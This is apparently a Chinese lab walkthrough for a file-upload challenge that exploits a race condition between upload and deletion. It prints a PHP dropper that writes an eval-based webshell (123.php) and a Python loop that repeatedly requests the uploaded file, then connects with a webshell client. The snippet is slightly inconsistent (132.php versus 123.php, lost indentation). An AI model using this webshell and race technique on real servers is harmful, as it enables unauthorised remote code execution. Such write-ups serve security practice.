这一关文件传上去会检测这个文件如果是图片类型的文件会改后缀然后回显,不是图片类型的就会删掉。所有要卡着删掉前访问下面这段php代码,这段php代码会生成一个php木马文件在目录下,这个文件不会被检测,也不会被删掉,所以就可以直接用蚁剑连接了
<?php fputs(fopen('123.php','w'),'<?php @eval($_POST["123"])?>');?>
然后就用burp一直循环发送上传这个文件的数据包请求
然后就是一直访问上传的666.php文件,赶在这个文件被删除前,会有一瞬间访问成功然后就会在上传目录里生成一个132.php的木马文件,然后就直接连接就可以了
接下来就是可以一直请求上传的那个文件的脚本
import requests
url = "http://x.x.x.x/upload/666.php"
while True:
html = requests.get(url)
if html.status_code == 600:
print("OK")
break
访问成功大概率不会生成木马文件因为在准备生成文件的时候就666.php大概率被删了,所以要无限次的访问666.php直到生成了123.php的木马文件,所以脚本上就设置了一个无法返回的响应600(这里只要不是200,404,502这种会被响应的就可以了)然后就是等待,可以去upload目录下去看,大概一分钟内就会生成123.php,然后用蚁剑连123.php就可以了